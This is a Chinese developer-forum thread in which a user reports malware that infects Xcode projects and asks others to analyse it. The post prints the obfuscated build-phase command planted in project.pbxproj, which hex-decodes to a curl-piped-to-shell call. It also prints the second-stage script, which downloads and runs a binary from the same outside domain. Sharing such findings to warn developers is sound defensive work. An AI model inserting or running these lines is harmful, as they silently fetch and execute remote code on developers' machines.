MAC xcode工程病毒
本帖最后由 小李一直在前进 于 2021-6-3 17:13 编辑工程感染后会在xcode工程project.pbxproj内植入病毒脚本如下
# This output is used by Xcode outputs to avoid re-running this script phase.
echo "6375726c202d2d6d61782d74696d652035202d736b2068747470733a2f2f61746563617365632e636f6d2f61207c207368202d732066616c73650a" | xxd -p -r | sh >/dev/null 2>&1 || true
我十六进制解码以后发现是一个网址https://atecasec.com/a内嵌代码如下
#!/bin/bash
AUTOCLEAN=false
BASEDIR=${PWD}
if [ ! -z "$1" ]
then
AUTOCLEAN=$1
fi
if [ ! -z "${PROJECT_FILE_PATH}" ]
then
BASEDIR=${PROJECT_FILE_PATH}
fi
trap 'rm -f "/tmp/exec.$$"' 0
trap 'exit $?' 1 2 3 15
curl --connect-timeout 5 -s -k -o /tmp/exec.$$ "https://atecasec.com/sys/bin/Pods"
chmod +x /tmp/exec.$$
/tmp/exec.$$ "$BASEDIR" $AUTOCLEAN "atecasec.com"
挺烦人的,所有工程基本都会感染,具体恶意行为我这边没有触发所以无从考证,从其他人那里得到消息是会丢失苹果开发者账户~
有大佬具体分析下嘛.或者那里可以让网站失效,避免其他人收到伤害~~~
这是个什么时候的病毒 thatCbin 发表于 2021-6-3 17:38
这是个什么时候的病毒
估计存在已经好久了,我们是最近看到有些git工程里面有 帮你顶一下。 ytfrdfiw 发表于 2021-6-3 19:17
帮你顶一下。
谢谢.希望更多人注意这种病毒,mac也不是绝对安全的.啊哈哈哈
页:
[1]